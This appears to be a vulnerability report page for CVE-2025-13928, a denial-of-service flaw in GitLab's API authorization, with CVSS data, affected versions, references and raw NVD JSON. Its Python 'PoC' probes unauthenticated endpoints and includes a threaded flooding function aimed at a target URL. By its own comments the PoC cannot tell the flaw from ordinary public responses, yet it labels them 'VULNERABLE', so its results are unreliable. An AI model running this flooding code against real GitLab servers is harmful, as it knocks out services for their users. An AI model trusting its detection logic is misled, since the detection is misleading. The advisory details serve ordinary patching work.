Security Vulnerability Report
CVE-2025-13928 CVSS 7.5 HIGH


Published: 2026-01-22 15:16:48
Last Modified: 2026-01-26 21:08:36

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.7 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to cause a denial of service condition by exploiting incorrect authorization validation in API endpoints.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness: CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE (17.7.0 <= version < 18.6.4; 18.7.0 <= version < 18.7.2; 18.8.0 <= version < 18.8.2)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE (17.7.0 <= version < 18.6.4; 18.7.0 <= version < 18.7.2; 18.8.0 <= version < 18.8.2)

Affected version ranges (both Community and Enterprise editions):
GitLab CE/EE 17.7 <= version < 18.6.4
GitLab CE/EE 18.7 <= version < 18.7.2
GitLab CE/EE 18.8 <= version < 18.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13928 PoC - GitLab API Authorization Bypass DoS
# Target: GitLab CE/EE < 18.6.4, < 18.7.2, < 18.8.2
# Author: Security Researcher
# Note: This PoC is for educational and authorized testing purposes only
import re
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

import requests


def check_gitlab_version(target_url):
    """Check if target GitLab version is vulnerable"""
    # Note: GET /api/v4/version requires authentication on GitLab, so an
    # unauthenticated request is normally answered with 401 and this
    # function then returns None.
    try:
        response = requests.get(f"{target_url}/api/v4/version", timeout=10)
        if response.status_code == 200:
            version_info = response.json()
            version = version_info.get('version', '')
            print(f"[*] Detected GitLab Version: {version}")
            return version
    except Exception as e:
        print(f"[!] Error checking version: {e}")
    return None


def exploit_api_endpoint(target_url, endpoint):
    """Attempt to exploit the authorization bypass vulnerability"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-13928-PoC)',
        'Content-Type': 'application/json'
    }
    try:
        # Attempt unauthenticated API request that should require authorization
        response = requests.get(
            f"{target_url}/api/v4/{endpoint}",
            headers=headers,
            timeout=5,
            allow_redirects=False
        )
        # Check if authorization bypass occurred.
        # Caveat: several GitLab endpoints (the default 'projects' included)
        # legitimately answer 200 to unauthenticated callers with public data,
        # so a 200 here is not on its own evidence of CVE-2025-13928.
        if response.status_code == 200:
            print(f"[!] VULNERABLE: Authorization bypass detected on {endpoint}")
            print(f"[*] Response preview: {response.text[:200]}")
            return True
        elif response.status_code in (401, 403):
            print(f"[+] SAFE: Endpoint {endpoint} properly requires authorization")
            return False
        else:
            print(f"[*] Endpoint returned status {response.status_code}")
            return None
    except requests.exceptions.Timeout:
        print(f"[!] Request timeout on {endpoint} - possible DoS condition")
        return None
    except Exception as e:
        print(f"[!] Error exploiting {endpoint}: {e}")
        return None


def dos_attack(target_url, endpoint, num_requests=100, threads=10):
    """Perform DoS attack by exploiting the vulnerability"""
    print(f"[*] Starting DoS attack with {num_requests} requests using {threads} threads")
    success_count = 0
    with ThreadPoolExecutor(max_workers=threads) as executor:
        futures = [
            executor.submit(exploit_api_endpoint, target_url, endpoint)
            for _ in range(num_requests)
        ]
        for future in as_completed(futures):
            result = future.result()
            if result:
                success_count += 1
    print(f"[*] Attack completed. {success_count}/{num_requests} requests successful")
    return success_count


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13928-poc.py <target_url> [endpoint]")
        print("Example: python cve-2025-13928-poc.py https://gitlab.example.com")
        sys.exit(1)

    target_url = sys.argv[1].rstrip('/')
    endpoint = sys.argv[2] if len(sys.argv) > 2 else 'projects'

    print(f"[*] Target: {target_url}")
    print(f"[*] Testing endpoint: {endpoint}")
    print("=" * 60)

    # Check version
    version = check_gitlab_version(target_url)
    if version:
        # Check if version is vulnerable. GitLab version strings may carry a
        # suffix such as "18.6.3-ee", so only the leading numeric triple is
        # parsed (a plain split('.') + int() would raise on the suffix).
        match = re.match(r'(\d+)\.(\d+)\.(\d+)', version)
        if match:
            major, minor, patch = (int(x) for x in match.groups())
            is_vulnerable = False
            if major == 17 and minor >= 7:
                is_vulnerable = True
            elif major == 18:
                if minor < 6 or (minor == 6 and patch < 4):
                    is_vulnerable = True
                elif minor == 7 and patch < 2:
                    is_vulnerable = True
                elif minor == 8 and patch < 2:
                    is_vulnerable = True

            if is_vulnerable:
                print("[!] Target appears to be VULNERABLE")
            else:
                print("[+] Target appears to be PATCHED")

    print("=" * 60)

    # Test for authorization bypass
    vulnerable = exploit_api_endpoint(target_url, endpoint)
    if vulnerable:
        print("\n[!] WARNING: Target is vulnerable to CVE-2025-13928")
        print("[*] Consider running DoS test (use responsibly):")
        print(f"[*] dos_attack('{target_url}', '{endpoint}', 50, 5)")

    print("\n[*] Remediation: Upgrade to GitLab 18.6.4, 18.7.2, or 18.8.2+")


if __name__ == '__main__':
    main()
```

References

https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/582736 (Broken Link)
https://hackerone.com/reports/3439441 (Permissions Required)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13928",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-22T15:16:47.603",
    "lastModified": "2026-01-26T21:08:36.220",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.7 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to cause a denial of service condition by exploiting incorrect authorization validation in API endpoints."
      },
      {
        "lang": "es",
        "value": "GitLab ha remediado un problema en GitLab CE/EE que afectaba a todas las versiones desde la 17.7 antes de la 18.6.4, la 18.7 antes de la 18.7.2 y la 18.8 antes de la 18.8.2, el cual podría haber permitido a un usuario no autenticado causar una condición de denegación de servicio al explotar una validación de autorización incorrecta en los puntos finales de la API."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-863"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "17.7.0", "versionEndExcluding": "18.6.4", "matchCriteriaId": "53C19D00-8774-4DB1-8AFB-8C9596DC70F3"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.7.0", "versionEndExcluding": "18.6.4", "matchCriteriaId": "F87D62E6-4EB4-4E17-9CEA-E23219785C8E"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.7.0", "versionEndExcluding": "18.7.2", "matchCriteriaId": "7E36C974-4A52-424A-8758-E45B750C013E"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.7.0", "versionEndExcluding": "18.7.2", "matchCriteriaId": "F71560B5-1000-45F1-8A5C-078D6C3D03E6"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.8.0", "versionEndExcluding": "18.8.2", "matchCriteriaId": "582D13A9-DEEE-4E3F-BFC5-61F270C99B86"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.8.0", "versionEndExcluding": "18.8.2", "matchCriteriaId": "760BBB79-D5BD-4871-8522-3C2C7E65767B"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]},
      {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/582736", "source": "[email protected]", "tags": ["Broken Link"]},
      {"url": "https://hackerone.com/reports/3439441", "source": "[email protected]", "tags": ["Permissions Required"]}
    ]
  }
}
```